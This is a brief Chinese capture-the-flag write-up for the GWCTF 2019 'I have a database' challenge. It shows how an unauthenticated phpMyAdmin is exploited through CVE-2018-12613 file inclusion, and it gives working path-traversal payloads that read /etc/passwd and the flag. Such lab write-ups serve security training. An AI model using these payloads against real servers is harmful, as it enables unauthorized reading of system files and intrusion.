• [GWCTF 2019]我有一个数据库

    [GWCTF 2019]我有一个数据库

    御剑扫一波

    http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/robots.txt
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/tbl_create.php
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/config.inc.php

    robots.txt里面提示了phpinfo.php
    在这里插入图片描述
    访问了一下没啥东西。

    再访问了一下phpmyadmin

    好家伙,直接进后台,密码都没的。

    查看版本号

    查看了一下服务器配置:
    在这里插入图片描述
    这里涉及到一个cve漏洞:
    phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞

    直接打payload

    ?target=db_datadict.php%253f/../../../../../../../../etc/passwd

    在这题的payload:

    http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag

    在这里插入图片描述
  • 相关阅读:
    cstc2018 混合果汁
    CF1086E Beautiful Matrix
    AT2000 Leftmost Ball
    CF1208E Let Them Slide
    CF1208D Restore Permutation
    【置顶】博客公告
    [NOI2015]软件包管理器
    【noip2018】积木大赛
    几天连测总结
    【ZJOI2007】棋盘制作
  • 原文地址:https://www.cnblogs.com/shenjuxian/p/13927799.html
Copyright © 2020-2023  润新知